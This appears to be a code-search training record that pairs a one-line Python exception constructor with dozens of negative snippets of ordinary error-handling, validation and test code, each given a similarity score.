def __init__(self, msg): self.msg = msg
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _invalid_option_error(self, option_name):\n msg = \"'{}' is not a valid option for the '{}' section.\".format(option_name, self._SECTION_NAME)\n raise ValueError(msg)", "def after_init(self):\n if self.options.format.appended:\n self.error_format = self.options.format.appended[0]", "def _raise_format_error(self, name: str, format_str: str, source_format: str):\n\n raise ValueError(f\"The '{ name }' should be { format_str }, rather than { source_format }\")", "def __init__(self, message=\"\"):\n super(ValidationError, self).__init__(message)", "def test_init_with_format_str_and_header_True_raises_error(self):\n with pytest.raises(ValueError):\n _ = CSVFormatter(fmt_str=\"\", header=True)", "def error(self, message):\n raise ArgumentParseError(message)", "def command_error(fmt, *args, **kwargs):\n raise CommandError(fmt.format(*args, **kwargs))", "def __init__(self, message):\n self.message = LicenseError.ERROR + message\n\n super(LicenseError, self).__init__(self.message)", "def error(self, message, token=None):\n raise ParseException(\n message,\n self.filename,\n line=self._line,\n line_number=self._line_number,\n token=token)", "def __init__(self, message: str) -> None:\n\n super().__init__(\n \"Due to the nature of the load data, an integer multiple of resolutions, \"\n \"or divsions of resolutions, must be supplied with the '--resolution' or \"\n \"'-r' flag.\\nI appreciate that this is poor coding, but at least I took \"\n \"the time to write a custom exception for it :p .\\n Error message: \"\n f\"{message}\"\n )", "def __init__(self, data_file_name: str, message: str) -> None:\n\n super().__init__(\n \"Invalid data error. \"\n \"The file '{}' contained data of the wrong format: {}\".format(\n data_file_name, message\n )\n )", "def __init__(self, message):\n logging.error(\"ERROR: {0}\".format(message))\n logging.error(\"Try running with --help for more information.\")", "def _incomplete_error(self, option_name):\n msg = \"'{}' must be specified for the '{}' section.\".format(option_name, self._SECTION_NAME)\n raise ValueError(msg)", "def __init__(__self__, *,\n message: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input['DataSourceErrorInfoType']] = None):\n if message is not None:\n pulumi.set(__self__, \"message\", message)\n if type is not None:\n pulumi.set(__self__, \"type\", type)", "def __init__(self, error_type: str):\n self.message = ''\n\n if error_type == 'length':\n self.message = 'Password must be between 6 and 100 characters long'\n\n elif error_type == 'one_lower':\n self.message = 'Password must contain at least one lowercase letter'\n\n elif error_type == 'one_upper':\n self.message = 'Password must contain at least one uppercase letter'\n\n elif error_type == 'one_digit':\n self.message = 'Password must contain at least one number'\n\n logging.error(str(self))\n super().__init__(self.message)", "def set_format(self, fmt):\n\n if \"{message}\" not in fmt:\n raise ValueError(\"Defining a log format (%s) that doesn't contain '{message}'\" % fmt)\n\n self._fmt = fmt", "def __init__(self, msg):\n super(F5CcclSchemaError, self).__init__(msg)\n self.msg = 'Schema provided is invalid: ' + msg", "def initFormat(self):\n pass", "def test_invalidValues(self):\n argV = \"--fooint egg\".split()\n self.assertRaises(usage.UsageError, self.usage.parseOptions, argV)", "def __init__(self, error_msg):\n super(SdkException, self).__init__()\n self.error_msg = error_msg", "def error(self, message):\r\n self._construct_partial_parser().error(message)", "def 
__init__(self, error = ''):\n IPRO_Error.__init__(self, error)", "def __init__(self, error = ''):\n IPRO_Error.__init__(self, error)", "def __init__(self, error = ''):\n IPRO_Error.__init__(self, error)", "def __init__(self, msg):\n\n super(ConfigError, self).__init__(msg)\n self.msg = msg", "def parse_error(self, message, exc_cls=VisualizerParseError):\n raise exc_cls(\"Error parsing %s '%s' (%s:%i): %s\" % \n (self.tag, self.ref, self.filename, self.lineno, message))", "def __init__(self, message, code=None, params=None):\n super().__init__(message, code, params)\n\n if isinstance(message, ValidationError):\n if hasattr(message, 'error_dict'):\n message = message.error_dict\n elif not hasattr(message, 'message'):\n message = message.error_list\n else:\n message, code, params = message.message, message.code, message.params\n\n if isinstance(message, dict):\n self.error_dict = {}\n for field, messages in message.items():\n if not isinstance(messages, ValidationError):\n messages = ValidationError(messages)\n self.error_dict[field] = messages.error_list\n\n elif isinstance(message, list):\n self.error_list = []\n for message in message:\n # Normalize plain strings to instances of ValidationError.\n if not isinstance(message, ValidationError):\n message = ValidationError(message)\n if hasattr(message, 'error_dict'):\n self.error_list.extend(sum(message.error_dict.values(), []))\n else:\n self.error_list.extend(message.error_list)\n\n else:\n self.message = message\n self.code = code\n self.params = params\n self.error_list = [self]", "def set_error(self, error):\n self._set_sub_text('error', text=str(error))\n return self", "def error(self, message=None, show_help=True):", "def __init__(self, format_string):\r\n if not isinstance(format_string, Compatibility.string):\r\n raise TypeError('format_string should be a string, instead got %s' % type(format_string))\r\n self._re_pattern, self._applicators = self._preprocess_format_string(format_string)\r\n self._re = re.compile(self._re_pattern)", "def __init__(self, data, validate=False):\n self._validate = validate\n super(StyleFormats, self).__init__(data or {})", "def error_message(self, error_message: str):\n\n self._error_message = error_message", "def testConstructorValueError(self):\n test_cases = [\n 'these',\n 'are',\n 'bad',\n 'data',\n 'types',\n 'FILE',\n 'STRING',\n 'JSON',\n ]\n for bad_data_type in test_cases:\n with self.assertRaises(ValueError):\n ASCIITransportFormat(bad_data_type, '')", "def test_init__invalid_error_handler_fails(self):\n\n class InvalidErrorHandler:\n pass\n\n with self.assertRaisesRegex(\n optimizely_exceptions.InvalidInputException, 'Provided \"error_handler\" is in an invalid format.',\n ):\n config_manager.StaticConfigManager(error_handler=InvalidErrorHandler())", "def __init__(self, message_id: str, error_code: str):\n super().__init__(f\"Command failed: {error_code}\")\n self.message_id = message_id\n self.error_code = error_code", "def test_set_value_invalid(self):\r\n name = 'option1'\r\n option = self.config.options[name]\r\n value = 'invalid'\r\n initial_value = self.config.values[name]\r\n\r\n self.assertRaises(InvalidOptionValueError, self.config.set_value, name, option, value)\r\n self.assertEqual(self.config.values[name], initial_value)", "def test_constructor_bad_value(self):\n self.assertRaises(line_format_errors.InputLineError,\n lambda: D1Line(self.bad_line))", "def validate_format(self):\n raise NotImplementedError()", "def opt_format(self, fmt):\n key = get_enum_key(fmt, FORMATTERS)\n if key 
is not None:\n self.conf[\"format\"] = key\n print(\"Set format %r\" % key)\n else:\n print(\"Unknown format %r\" % fmt)", "def __init__(self, module, message, _type, exc_message=None, *args, **kwargs):\n logger.error(\"[{}] {} {} {}\".format(module,\n _type,\n '<{}>'.format(exc_message) if exc_message else '',\n message))\n super(CliException, self).__init__(message, *args)\n self.message = message\n self.type = _type\n self.exc_message = exc_message\n self.str_at_error = kwargs.get('str_at_error', None)", "def validate(self):\n if self.params.get(\"format\"):\n if self.params[\"format\"] not in formats:\n raise ValueError(f\"format must be one of {formats}: {self.dt}\")\n for p in self.required:\n if not self.params.get(p):\n raise ValueError(f\"{p} missing: {self.dt}\")", "def test_constructor_bad_value(self):\n self.assertRaises(line_format_errors.InputLineError,\n lambda: C2Line(self.bad_line))", "def __init__(self):\n\n # dictionary that link all the invalid equation code to the\n # corresponding error massage\n self.ERROR_MASSAGE_DIC = {\n InvalidEquationCode.VALID: \"Valid\",\n InvalidEquationCode.UNDEFINED_CHARACTERS:\n \"Undefined characters in your equation\",\n InvalidEquationCode.CLOSE_WITHOUT_OPEN_BRACKET:\n \"Close bracket without open one\",\n InvalidEquationCode.EMPTY_EQUATION:\n \"Empty equation\",\n InvalidEquationCode.TOO_MANY_OPEN_BRACKET:\n \"Too many open brackets...(missing close brackets)\",\n InvalidEquationCode.OPERATORS_OPERANDS_ERROR:\n \"Missing operators/operands..\",\n InvalidEquationCode.TOO_MANY_DOTS:\n \"Too many dots in one number\",\n InvalidEquationCode.UNNECESSARY_BRACKET:\n \"Unnecessary brackets in your equation\",\n InvalidEquationCode.DIVISION_BY_ZERO:\n \"Division by zero is undefined\",\n InvalidEquationCode.FACTORIAL_ON_NEGATIVE_NUMBER:\n \"Factorial on negative number is illegal\",\n InvalidEquationCode.FACTORIAL_ON_DECIMAL_NUMBER:\n \"Factorial on negative number is illegal\",\n InvalidEquationCode.NUMBER_TOO_BIG: \"Number is too big\",\n InvalidEquationCode.COMPLEX_NUMBER: \"Complex number\",\n InvalidEquationCode.EMPTY_DECIMAL_POINT:\n \"Empty decimal point....(missing number)\",\n }", "def __init__(self, source, bad):\n super(RequestFormatException, self).__init__()\n self.source = source\n self.bad = bad", "def __init__(self, msg: str, definition: Optional[ErrorDef] = None) -> None:\n if definition is None:\n definition = CommonErrorDef.INTERNAL_SERVER_ERROR\n\n super().__init__(definition=definition, error=msg)", "def error_message(self, error_message):\n\n self._error_message = error_message", "def __init__(self, message=None):\n if message is not None:\n super(CryptoritoError, self).__init__(message)\n else:\n super(CryptoritoError, self).__init__()", "def __init__(self, msg):\n super(F5CcclValidationError, self).__init__(msg)\n self.msg = 'Service configuration provided does not match schema: ' + \\\n msg", "def error_message(self, error_field=None, **kwargs):\n\n if error_field:\n return \"Validation failed in Validator \\\"{}\\\" on field \\\"{}\\\"\".format(self.__class__.__name__, error_field)\n return \"Validation failed in Validator \\\"{}\\\"\".format(self.__class__.__name__)", "def __init__(self, message=\"\"):\n super(DataError, self).__init__(message)", "def __init__(self,value,message):\n ValueError.__init__(self,value,message)", "def __init__(self, raise_error: Optional[bool] = False):\n self.raise_error = raise_error", "def __init__(__self__, *,\n error_code: pulumi.Input[Union[str, 'CopyCompletionErrorReason']],\n 
error_message: pulumi.Input[str]):\n pulumi.set(__self__, \"error_code\", error_code)\n pulumi.set(__self__, \"error_message\", error_message)", "def __init__(self, exception, message=\"Invalid requests parse!\"):\n self.message = message\n self.exception = exception\n super().__init__(self.message)", "def __init__(self, error_message: str=None, error_code: int=None): # noqa: E501\n self.swagger_types = {\n 'error_message': str,\n 'error_code': int\n }\n\n self.attribute_map = {\n 'error_message': 'error_message',\n 'error_code': 'error_code'\n }\n\n self._error_message = error_message\n self._error_code = error_code", "def __init__(self, message=\"\"):\n super(ApplicationError, self).__init__(message)", "def __str__(self):\n return \"ParseException: %s\" % self.__msg", "def setup_fmt(self, ctx):\n ctx.implicit_errors = False", "def set_error_message(msg):\n set_message(msg, TYPE_ERROR)", "def __init__(self):\n self.message = \"Invalid time zone string, choose one from https://stackoverflow.com/questions/13866926/is-there-a-list-of-pytz-timezones.\"", "def _validate_format(self, full_encrypted_value, **options):\n\n if not self.FORMAT_REGEX.match(full_encrypted_value):\n raise InvalidEncryptedValueError('Input value is not a valid '\n '[{current}] encryption value.'\n .format(current=self._get_algorithm()))", "def init(self, *args, **kwargs):\n try:\n self._init(*args, **kwargs)\n except (ValueError, TypeError, UnicodeError, ConfigParser.Error), exc:\n raise ConfigInvalidError, str(exc), sys.exc_info()[2]", "def __init__(self, msg):\n\n super(DBValueError, self).__init__(msg)\n self.msg = msg", "def set_error(self, code: Optional[int] = None, text: Optional[str] = None) -> None:\n if code is not None:\n self.error_code = code\n if text is not None:\n self.error_text = text", "def pm_error(vector, format_string):\n return (format_string + \" +\" + format_string + \" -\" + format_string) % \\\n pm_vector(vector)", "def test_set_property_invalid(self):\r\n try:\r\n initial_value = self.config.values['option1']\r\n self.config.option1 = 'invalid'\r\n except Exception as e:\r\n self.assertIsInstance(e, InvalidOptionValueError)\r\n self.assertEqual(self.config.values['option1'], initial_value)", "def __init__(self, message, file_handle, format):\n oh = open(file_handle, \"rU\")\n config.log.critical(\"Unrecognised file format\")\n print(\"-----------------------\")\n print(\"Diagnostic:\")\n print(\"0:\", oh.readline().rstrip(\"\\r\\n\"))\n print(\"1:\", oh.readline().rstrip(\"\\r\\n\"))\n print(\"2:\", oh.readline().rstrip(\"\\r\\n\"))\n print(\"3:\", oh.readline().rstrip(\"\\r\\n\"))\n if \"sniffer\" in format:\n print(\"Format Specifier: Sniffer (guess the file format)\")\n else:\n print(\n \"Format Specifier: %s\"\n % \" \".join(\"%s:%s\" % (key, format[key]) for key in format)\n )\n\n print(\"-----------------------\")\n config.log.critical(\"%s\" % (message,))\n print()", "def format_error(invalid, doc_type):\n # using string for checking is probably not ideal,\n # but voluptuous does not have specific sub error\n # types for these errors\n if invalid.error_message == 'extra keys not allowed':\n msg = \"Key '{}' is not allowed\".format(invalid.path[0])\n elif invalid.error_message == 'required key not provided':\n msg = \"{} '{}' is missing\".format(doc_type, invalid.path[0])\n else:\n msg = invalid.message\n return {'message': msg, 'field': str(invalid.path[0])}", "def error_message(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"error_message\")", "def show_validation_error(\n 
file_path: Optional[Union[str, Path]] = None,\n *,\n title: Optional[str] = None,\n desc: str = \"\",\n show_config: Optional[bool] = None,\n hint_fill: bool = True,\n):\n try:\n yield\n except ConfigValidationError as e:\n title = title if title is not None else e.title\n if e.desc:\n desc = f\"{e.desc}\" if not desc else f\"{e.desc}\\n\\n{desc}\"\n # Re-generate a new error object with overrides\n err = e.from_error(e, title=\"\", desc=desc, show_config=show_config)\n msg.fail(title)\n print(err.text.strip())\n if hint_fill and \"value_error.missing\" in err.error_types:\n config_path = (\n file_path\n if file_path is not None and str(file_path) != \"-\"\n else \"config.cfg\"\n )\n msg.text(\n \"If your config contains missing values, you can run the 'init \"\n \"fill-config' command to fill in all the defaults, if possible:\",\n spaced=True,\n )\n print(f\"{COMMAND} init fill-config {config_path} {config_path} \\n\")\n sys.exit(1)\n except InterpolationError as e:\n msg.fail(\"Config validation error\", e, exits=1)", "def test_parser_init_with_invalid_project_type(parser):\n with pytest.raises(SystemExit):\n parser.parse_args(['--init', 'error'])", "def error_dialog(self, title, message):\n return self._impl.error_dialog(title, message)", "def __init__(self, message=None):\n if message is None:\n message = \"Game error!\"\n self.__message = message", "def _raise_argument_validation_exception(typedef, value, detail, expected_tokens=None):\n typedef_name = typedef.get('help-name')\n if typedef_name is None:\n typedef_name = typedef.get('name')\n if typedef_name is None:\n typedef_name = typedef.get('field')\n if typedef_name is None:\n typedef_name = '<unknown-type>'\n if detail is None:\n detail = ''\n validation_error_format = typedef.get('validation-error-format',\n 'Invalid %(typedef)s: %(value)s; %(detail)s')\n validation_error = (validation_error_format %\n {'typedef': typedef_name, 'value': str(value), 'detail': detail})\n raise error.ArgumentValidationError(validation_error, expected_tokens)", "def create_error_box(self, message):\n messagebox.showerror(\"Error\", message)", "def unsuported_format(self, msg):\n raise UnsupportedError(self.file.name+\" linker map format not supported by parser:\\n \"+ msg)", "def error_message(self, error_message):\n # type: (string_types) -> None\n\n if error_message is not None:\n if not isinstance(error_message, string_types):\n raise TypeError(\"Invalid type for `error_message`, type has to be `string_types`\")\n\n self._error_message = error_message", "def load_error(self, error=None):\n if error is not None or str(error).strip() != \"\":\n dial = wx.MessageDialog(self.parent, str(error),\n 'Error Loading File',\n wx.OK | wx.ICON_EXCLAMATION)\n dial.ShowModal()", "def __init__(self, from_email):\n self.code = 400\n self.from_email = from_email\n Error.__init__(self)", "def __init__(self, err_code=None):\n self.err_code = err_code\n if self.err_code in [member.value for name, member in NrfjprogdllErr.__members__.items()]:\n err_str = 'An error was reported by NRFJPROG DLL: {} {}.'.format(self.err_code, NrfjprogdllErr(self.err_code).name)\n else:\n err_str = 'An error was reported by NRFJPROG DLL: {}.'.format(self.err_code)\n\n Exception.__init__(self, err_str)", "def valid_source_format(self, valid_source_format):\n\n self._valid_source_format = valid_source_format", "def error_message(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"error_message\")", "def error_message(self) -> Optional[pulumi.Input[str]]:\n return 
pulumi.get(self, \"error_message\")", "def handle_invalid_parameter(message_id, *format, status = HttpStatus.BAD_REQUEST, var = (None, None)):\n\tif (var[1] and var[0] is None):\n\t\treturn handle_invalid_parameter(\"invalid_value\", var[1])\n\n\tmessage = MSG[message_id].copy()\n\tmessage[\"message\"] = message[\"message\"].format(*format)\n\treturn json_response(message, status)", "def setErrorMessage(self, errorText, errorColor = 0):\n\n if (errorColor == 1):\n errorColor = \"QTextEdit {color:Green}\"\n elif (errorColor == 0):\n errorColor = \"QTextEdit {color:red}\"\n else:\n # Why did you do this? Read the function? I'm going to make the text white to punish you\n errorColor = \"QTextEdit {color:white}\"\n \n node = EditUtil.EditUtil().getParameterNode()\n node.SetParameter(\"TraceAndSelect,errorMessage\", str(errorText))\n node.SetParameter(\"TraceAndSelect,errorMessageColor\", str(errorColor))\n return", "def __init__(self, error_search=\"error\"):\n self.error_search = error_search", "def error(self, message: str) -> None:\n lines = message.split('\\n')\n linum = 0\n formatted_message = ''\n for line in lines:\n if linum == 0:\n formatted_message = 'Error: ' + line\n else:\n formatted_message += '\\n ' + line\n linum += 1\n\n self.print_usage(sys.stderr)\n\n # Format errors with style_warning()\n formatted_message = ansi.style_warning(formatted_message)\n self.exit(2, '{}\\n\\n'.format(formatted_message))", "def formatError(self,error):\n return '<font color=\"#f00\"><b><i>%s</i></b></font><br />\\n' % error", "def _config_error(self, message, status=2):\n self.parser.exit(status, f\"{self.parser.prog}: failed loading config: {message}\\n\")", "def __init__(self, value: str):\n self.options = [\n \"m\",\n ]", "def test_single_specifier_missing(self):\n template = 'missing'\n value_count = 1\n msg = 'The formatter should contain one \"{}\" specifier.'\n with six.assertRaisesRegex(self, ValidationError, msg):\n validate_str_substitution(template, value_count)", "def generateerrormessage(self, cheqbalvalid=False, savebalvalid=False,\r\n cheqcsvvalid=False, savecsvvalid=False,\r\n pdfdirvalid=False):\r\n error_message = ''\r\n if not cheqbalvalid:\r\n error_message += ('Initial chequing balance must be a number ' +\r\n 'with a maximum of two decimal places.\\n')\r\n if not savebalvalid:\r\n error_message += ('Initial saving balance must be a number ' +\r\n 'with a maximum of two decimal places.\\n')\r\n if not cheqcsvvalid:\r\n error_message += ('Chequing csv must be an existing .csv or ' +\r\n '.txt file.\\n')\r\n if not savecsvvalid:\r\n error_message += ('Saving csv must be an existing .csv or ' +\r\n '.txt file.\\n')\r\n if not pdfdirvalid:\r\n error_message += ('Entry of directory to save pdf, must exist.\\n')\r\n\r\n messagebox.showerror('Entry Error', error_message)", "def message_error_validator():\n\n return validator.MessageErrorSchema()", "def test_allProtosDisabledError(self):\n options = Options()\n self.assertRaises(\n UsageError, options.parseOptions, ([\"--no-pop3\", \"--no-smtp\"])\n )", "def test_init__invalid_logger_fails(self):\n\n class InvalidLogger:\n pass\n\n with self.assertRaisesRegex(\n optimizely_exceptions.InvalidInputException, 'Provided \"logger\" is in an invalid format.',\n ):\n config_manager.StaticConfigManager(logger=InvalidLogger())", "def error(self, message):\n raise io_mp.ConfigurationError(message)", "def __init__(self, error_num, args, msg):\n\n self.error_num = error_num\n self.args = args\n self.message = msg", "def 
test_validation_wrong_options():\n options = [\n (\"found unknown parameter\", {'unknown_options': 3}),\n (\"parameter minimize=100 is incompatible with True\", {'minimize': 100}),\n (\"invalid literal for int\", {'processes_per_experiment': 'incorrect_string'})\n ]\n for regex, option in options:\n yield assert_raises_regexp, YamlParseError, regex, ExperimentBuilder._validate_options, option, True", "def __init__(self, port):\n super(InvalidPort, self).__init__(\n 'The port (\"{0}\") is not valid.'.format(port))", "def _raise_value_error(self, option, typestring, value):\n qual = option._qualified_name()\n if qual[0] == 'trac.ini':\n raise ConfigurationError(\n _('trac.ini [%(sec)s] %(opt)s = \"%(val)s\": invalid %(type)s',\n sec=self.section, opt=qual[1],\n type=typestring, val=repr(value)))\n if qual[0] == 'macroarg':\n raise ValueError(\n _('macro argument %(opt)s = \"%(val)s\": invalid %(type)s',\n opt=qual[1], type=typestring, val=repr(value)))\n if qual[0] == 'default':\n raise TracError(\n _('plugin default %(opt)s = \"%(val)s\": invalid %(type)s',\n opt=qual[1], type=typestring, val=repr(value)))", "def __init__(self, domain, field, **options):\n\n super().__init__(domain, field, **options)\n\n if not callable(self.accepted_minimum_provider) and \\\n not callable(self.accepted_maximum_provider) and \\\n self.accepted_minimum is not None and self.accepted_maximum is not None \\\n and self.accepted_minimum > self.accepted_maximum:\n raise MinimumValueLargerThanMaximumValueError('Accepted minimum value for '\n 'validator [{name}] could not be '\n 'larger than accepted maximum value.'\n .format(name=self))\n\n self._validate_exception_type(self.range_value_error)" ]
[ "0.59847456", "0.5878398", "0.5871973", "0.5698404", "0.5652391", "0.5610471", "0.5598633", "0.5526274", "0.5502418", "0.5481143", "0.54788643", "0.54560614", "0.5371777", "0.53679717", "0.53327733", "0.53201747", "0.52955824", "0.52891856", "0.5285651", "0.5220381", "0.51965994", "0.51859534", "0.51859534", "0.51859534", "0.51381797", "0.5125947", "0.5115851", "0.51144046", "0.5113572", "0.5105339", "0.51053303", "0.5101762", "0.50843394", "0.5076106", "0.5055994", "0.50527275", "0.50453955", "0.5045148", "0.5043948", "0.50418144", "0.5009198", "0.50012946", "0.499825", "0.4996366", "0.49878788", "0.49874875", "0.4984682", "0.49747175", "0.49712592", "0.49696645", "0.4961283", "0.49486414", "0.49431533", "0.49325177", "0.49321282", "0.4918043", "0.49150202", "0.49141705", "0.4896577", "0.4892512", "0.4889117", "0.4886641", "0.4886312", "0.48834065", "0.4875004", "0.48722568", "0.48706177", "0.48673418", "0.48498484", "0.48473257", "0.48422447", "0.48349395", "0.48302326", "0.48274013", "0.48188207", "0.48147893", "0.4799852", "0.47989005", "0.47925532", "0.47868362", "0.47861636", "0.4781615", "0.4781615", "0.47653362", "0.47613898", "0.476067", "0.47567353", "0.47540504", "0.4753414", "0.47365284", "0.47363976", "0.47296193", "0.4722344", "0.4721958", "0.4721934", "0.47209188", "0.47150713", "0.47116524", "0.47104523", "0.47095472", "0.4708898" ]
0.0
-1
Initializes InvalidFieldLength with an error message.
def __init__(self, msg): self.msg = msg
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_validation_fails_with_invalid_field_length(self):\n\n result = LandCompensationLandSoldValidator.validate(INVALID_FIELD_LENGTH, INVALID_FIELD_LENGTH)\n self.assertEqual(2, len(result.errors))\n self.assertEqual('Answer too long', result.errors['land-sold-description'].summary_message)\n self.assertEqual('Answer too long', result.errors['land-works-particulars'].summary_message)", "def validate(cls, **kwargs: Any) -> None:\n max_length = kwargs.get(\"max_length\", None)\n if max_length <= 0:\n raise ModelDefinitionError(\n \"Parameter max_length is required for field String\"\n )", "def test_invalidMaxLength(self):\n self.assertRaises(ValueError, self.client.msg, \"foo\", \"bar\", 0)\n self.assertRaises(ValueError, self.client.msg, \"foo\", \"bar\", 3)", "def __init__(self, message, code=None, params=None):\n super().__init__(message, code, params)\n\n if isinstance(message, ValidationError):\n if hasattr(message, 'error_dict'):\n message = message.error_dict\n elif not hasattr(message, 'message'):\n message = message.error_list\n else:\n message, code, params = message.message, message.code, message.params\n\n if isinstance(message, dict):\n self.error_dict = {}\n for field, messages in message.items():\n if not isinstance(messages, ValidationError):\n messages = ValidationError(messages)\n self.error_dict[field] = messages.error_list\n\n elif isinstance(message, list):\n self.error_list = []\n for message in message:\n # Normalize plain strings to instances of ValidationError.\n if not isinstance(message, ValidationError):\n message = ValidationError(message)\n if hasattr(message, 'error_dict'):\n self.error_list.extend(sum(message.error_dict.values(), []))\n else:\n self.error_list.extend(message.error_list)\n\n else:\n self.message = message\n self.code = code\n self.params = params\n self.error_list = [self]", "def __init__(self, message=\"\"):\n super(ValidationError, self).__init__(message)", "def __init__(self, error_type: str):\n self.message = ''\n\n if error_type == 'length':\n self.message = 'Password must be between 6 and 100 characters long'\n\n elif error_type == 'one_lower':\n self.message = 'Password must contain at least one lowercase letter'\n\n elif error_type == 'one_upper':\n self.message = 'Password must contain at least one uppercase letter'\n\n elif error_type == 'one_digit':\n self.message = 'Password must contain at least one number'\n\n logging.error(str(self))\n super().__init__(self.message)", "def test_init_chunk_size_field_below_range(self):\n test_config = TestConfig(chunk_size=-1)\n with self.assertRaises(ValidationError):\n test_config.clean_fields()", "def testMessageFieldValidate_Initialized(self):\n class MyMessage(messages.Message):\n field1 = messages.IntegerField(1, required=True)\n\n field = messages.MessageField(MyMessage, 10)\n\n # Will validate messages where is_initialized() is False.\n message = MyMessage()\n field.validate(message)\n message.field1 = 20\n field.validate(message)", "def message_error_validator():\n\n return validator.MessageErrorSchema()", "def get_field_length_error_text(field_name):\n\n\treturn(\"Value entered for '{0}' exceeds character length limit of {1}\"\n\t\t .format(field_name, str(field_length_limit)))", "def validate(cls, **kwargs: Any) -> None:\n max_length = kwargs.get(\"max_length\", None)\n if max_length <= 0:\n raise ModelDefinitionError(\n \"Parameter max_length is required for field LargeBinary\"\n )", "def _update_length(self, field, tag_id, value):\n # pylint: disable=unused-argument\n if tag_id 
not in {8, 9, 10}:\n self._message_length += len(field) + 1\n if self._message_length >= self._max_length:\n raise FIXLengthTooLongError(\n f'message too long: {self._message_length}')", "def test_femattribute_length_different_error(self):\n with self.assertRaises(ValueError):\n FEMAttribute('', [1, 2, 3], [10., 20., 30., 40.])", "def test_init_bytes_field_below_range(self):\n test_config = TestConfig(bytes=-1)\n with self.assertRaises(ValidationError):\n test_config.clean_fields()", "def __init__(self, msg):\n super(F5CcclSchemaError, self).__init__(msg)\n self.msg = 'Schema provided is invalid: ' + msg", "def __init__(self, *args, **kwargs):\n kwargs[\"max_length\"] = 49\n super().__init__(*args, **kwargs)", "def __init__(self, min_length=None, max_length=None):\n self.min_length = min_length\n self.max_length = max_length", "def __init__(self, min_length=None, max_length=None):\n self.min_length = min_length\n self.max_length = max_length", "def __init__(self, error_message: str=None, error_code: int=None): # noqa: E501\n self.swagger_types = {\n 'error_message': str,\n 'error_code': int\n }\n\n self.attribute_map = {\n 'error_message': 'error_message',\n 'error_code': 'error_code'\n }\n\n self._error_message = error_message\n self._error_code = error_code", "def check_length(length):\n if length > lengthLimit:\n err_str = \"The length value (%s) is higher than the \" % (length)\n err_str += \"limit length (%s)\" % (lengthLimit)\n raise ValueError(err_str)", "def __init__(self, msg):\n\n super(DBValueError, self).__init__(msg)\n self.msg = msg", "def test_models_meetings_name_maxlength(self):\n MeetingFactory(name=\"a\" * 500)\n with self.assertRaises(ValidationError) as context:\n MeetingFactory(name=\"a\" * 501)\n\n self.assertEqual(\n context.exception.messages,\n [\"Ensure this value has at most 500 characters (it has 501).\"],\n )", "def _validate_length(data, min, max, err): # lint-amnesty, pylint: disable=redefined-builtin\n if len(data) < min or len(data) > max:\n raise errors.AccountDataBadLength(err)", "def test_more_than_max_length_invalid_password(self):\n pass_field = Field(\"\".join(['x' * (int(self.app.config['MAX_PWD_LEN']) + 1)]))\n\n with self.assertRaises(ValidationError):\n valid_password(None, pass_field)", "def __init__(self, message=\"\"):\n super(DataError, self).__init__(message)", "def testValidate_Required(self):\n class SimpleMessage(messages.Message):\n required = messages.IntegerField(1, required=True)\n\n simple_message = SimpleMessage()\n self.assertRaises(messages.ValidationError,\n simple_message.check_initialized)\n simple_message.required = 10\n simple_message.check_initialized()", "def __init__(self):\n self.message = \"Boundary too large, must be less than one degree of latitude and longitude.\"", "def __init__(self, length=None, field1=None, field2=None, field3=None,\n field4=None):\n super().__init__()\n self.length = length\n self.field1 = field1\n self.field2 = field2\n self.field3 = field3\n self.field4 = field4", "def _check_field_length(self, field, value, options=None):\n options = options if options else field.GetOptions()\n for (option, setting) in options.ListFields():\n if option.name == \"length\":\n if self.__gt_by_type(value, setting):\n if hasattr(field, \"name\"):\n raise FieldTooLongException(\"The field '\" + field.name +\n \"' is bigger than the allowed \" + str(setting) + \" bytes\")\n else:\n raise FieldTooLongException(\"List element '\" + str(value) +\n \"' is bigger than the allowed \" + str(setting) + \" bytes\")", "def 
error_message(self, error_field=None, **kwargs):\n\n if error_field:\n return \"Validation failed in Validator \\\"{}\\\" on field \\\"{}\\\"\".format(self.__class__.__name__, error_field)\n return \"Validation failed in Validator \\\"{}\\\"\".format(self.__class__.__name__)", "def __init__(self, domain, field, **options):\n\n super().__init__(domain, field, **options)\n\n inclusive_maximum = options.get('inclusive_maximum')\n if inclusive_maximum is None:\n if self.default_inclusive_maximum is not None:\n inclusive_maximum = self.default_inclusive_maximum\n else:\n inclusive_maximum = True\n\n if self.default_accepted_maximum is None and \\\n (self.field is None or self.field.max_value is None):\n raise AcceptedMaximumValueMustBeProvidedError('Accepted maximum value for '\n 'validator [{name}] could not '\n 'be None.'.format(name=self))\n\n self._inclusive_maximum = inclusive_maximum\n self._instance_accepted_maximum = None\n if self.default_accepted_maximum is None:\n self._instance_accepted_maximum = self.field.max_value\n\n self._validate_exception_type(self.maximum_value_error)", "def test_validate_max_length(self):\n test_strings = [\n 'thisloooooooooooooooongstring',\n True,\n 45,\n ]\n\n testrow = TestSchema()\n\n for test_string in test_strings:\n testrow.string_max_field = test_string\n self.assertRaises(Exception, testrow.save)", "def __init__(self, from_email):\n self.code = 400\n self.from_email = from_email\n Error.__init__(self)", "def error_message(self, error_message):\n if (self.local_vars_configuration.client_side_validation and\n error_message is not None and len(error_message) > 500):\n raise ValueError(\"Invalid value for `error_message`, length must be less than or equal to `500`\") # noqa: E501\n\n self._error_message = error_message", "def check_initialized(self):\n for name, field in self.__by_name.items():\n value = getattr(self, name)\n if value is None:\n if field.required:\n raise ValidationError(\n \"Message %s is missing required field %s\" %\n (type(self).__name__, name))\n else:\n try:\n if (isinstance(field, MessageField) and\n issubclass(field.message_type, Message)):\n if field.repeated:\n for item in value:\n item_message_value = field.value_to_message(\n item)\n item_message_value.check_initialized()\n else:\n message_value = field.value_to_message(value)\n message_value.check_initialized()\n except ValidationError as err:\n if not hasattr(err, 'message_name'):\n err.message_name = type(self).__name__\n raise", "def __init__(self, error_msg):\n super(SdkException, self).__init__()\n self.error_msg = error_msg", "def test_value_init18(self):\n with self.assertRaises(ValueError) as err:\n r1 = Rectangle(0, 19)\n msg = \"width must be > 0\"\n self.assertEqual(str(err.exception), msg)", "def test_field_len(self):\n client = self.base_scenario(\n frang_config=\"http_field_len 300;\",\n requests=[f\"POST /1234 HTTP/1.1\\r\\nHost: localhost\\r\\nX-Long: {'1' * 320}\\r\\n\\r\\n\"],\n )\n self.check_response(\n client,\n status_code=\"403\",\n warning_msg=\"frang: HTTP (in-progress )?field length exceeded for\",\n 